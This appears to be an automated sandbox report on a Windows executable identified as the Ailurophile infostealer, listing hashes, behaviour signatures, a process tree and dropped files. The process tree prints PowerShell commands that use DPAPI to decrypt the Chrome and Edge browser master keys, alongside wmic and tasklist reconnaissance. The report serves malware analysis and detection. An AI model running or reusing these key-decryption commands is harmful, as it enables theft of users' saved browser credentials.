Overview

overview

10

Static

static

10

0356641a2d...a0.exe

windows7-x64

10

0356641a2d...a0.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 07:42

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0356641a2d2bd0935fe3efae2f9fab8278790244fa87db7e4302cf3166dc91a0.exe

  • Size

    21.3MB

  • MD5

    94f08807d74353f2689be22c2fe0354b

  • SHA1

    a6bec8a7b3e1878098168d02473861c95b56e434

  • SHA256

    0356641a2d2bd0935fe3efae2f9fab8278790244fa87db7e4302cf3166dc91a0

  • SHA512

    91e2b9db90f94aee8aba2791edfbf88a7b89cc5b489a63ad60273e2dd2dce79ad9e2029d79c04316d9e73b05f63161cc586b1c7ebb1d945bb6da8a4d656a2663

  • SSDEEP

    196608:+KopoPyXk3iLXTIX5J/YJMIYhOFjBe1ZiieX:HoP/bTIX5lDeALiie

Score
10/10
ailurophilediscoveryexecutionspywarestealer

Malware Config

Signatures

  • Ailurophile

    Ailurophile is stealer written in Delphi.

    stealerailurophile
  • Ailurophile family
    ailurophile
  • Detects Ailurophile payload 1 IoCs

    Ailurophile is stealer written in Delphi.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
    discovery
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0356641a2d2bd0935fe3efae2f9fab8278790244fa87db7e4302cf3166dc91a0.exe
    "C:\Users\Admin\AppData\Local\Temp\0356641a2d2bd0935fe3efae2f9fab8278790244fa87db7e4302cf3166dc91a0.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_videocontroller get caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2400
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2544
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Version
      2⤵
        PID:3684
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(Get-Item 'C:\Program Files\Google\Chrome\Application\chrome.exe').VersionInfo.FileVersion"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "(Get-Item 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe').VersionInfo.FileVersion"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4044
      • C:\Windows\system32\tasklist.exe
        tasklist
        2⤵
        • Enumerates processes with tasklist
        PID:4828
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,173,23,58,226,64,18,35,252,62,109,217,109,50,51,70,111,155,222,242,9,224,37,157,230,165,68,165,185,211,49,49,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,167,19,28,55,35,159,72,144,232,138,95,53,207,241,45,125,38,169,214,195,58,208,191,244,96,113,176,71,7,141,190,38,48,0,0,0,117,66,159,130,233,245,228,59,130,121,106,47,234,101,128,129,29,214,246,33,124,187,113,167,162,66,114,171,21,245,192,210,106,157,167,55,233,2,167,60,61,141,32,49,90,109,101,222,64,0,0,0,144,153,26,55,173,144,182,243,129,105,154,36,244,161,139,131,140,172,123,98,175,199,251,53,161,181,16,196,110,7,180,160,85,239,33,43,244,195,4,27,254,254,42,165,198,142,157,194,60,211,81,249,249,106,146,250,202,34,9,88,135,200,7,98), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command " Add-Type -AssemblyName \"System.Security\"; $decryptedKey = [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,164,61,33,122,12,185,122,77,183,105,249,118,216,100,46,57,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,211,70,96,136,23,97,232,196,23,236,15,131,47,3,98,220,6,100,154,40,168,138,47,233,170,55,5,216,55,207,120,71,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,209,93,186,16,185,176,56,94,38,18,69,151,120,64,123,189,182,116,165,205,106,221,248,198,170,129,178,6,111,143,178,16,48,0,0,0,2,87,51,176,5,232,194,197,177,98,39,83,181,73,130,234,249,123,153,34,103,103,231,28,92,67,202,93,35,83,25,23,147,160,83,225,90,0,94,77,98,207,123,60,57,170,133,243,64,0,0,0,70,211,83,111,77,127,96,68,203,185,188,21,183,217,244,180,71,78,241,65,174,189,255,2,107,74,104,61,138,164,230,232,140,14,33,123,35,124,165,97,112,231,172,216,199,17,27,164,75,141,41,255,65,205,22,36,38,159,197,36,43,121,87,182), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:5044

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      6cf293cb4d80be23433eecf74ddb5503

      SHA1

      24fe4752df102c2ef492954d6b046cb5512ad408

      SHA256

      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

      SHA512

      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      50a8221b93fbd2628ac460dd408a9fc1

      SHA1

      7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

      SHA256

      46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

      SHA512

      27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      446dd1cf97eaba21cf14d03aebc79f27

      SHA1

      36e4cc7367e0c7b40f4a8ace272941ea46373799

      SHA256

      a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

      SHA512

      a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      8e26941f21dac5843c6d170e536afccb

      SHA1

      26b9ebd7bf3ed13bc51874ba06151850a0dac7db

      SHA256

      316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0

      SHA512

      9148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vbyzdn05.b33.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/1576-2-0x0000023B1FEF0000-0x0000023B1FF12000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2644-95-0x00007FF774760000-0x00007FF775D12000-memory.dmp

      Filesize

      21.7MB

      Download

    • memory/4508-35-0x0000016748140000-0x0000016748190000-memory.dmp

      Filesize

      320KB

      Download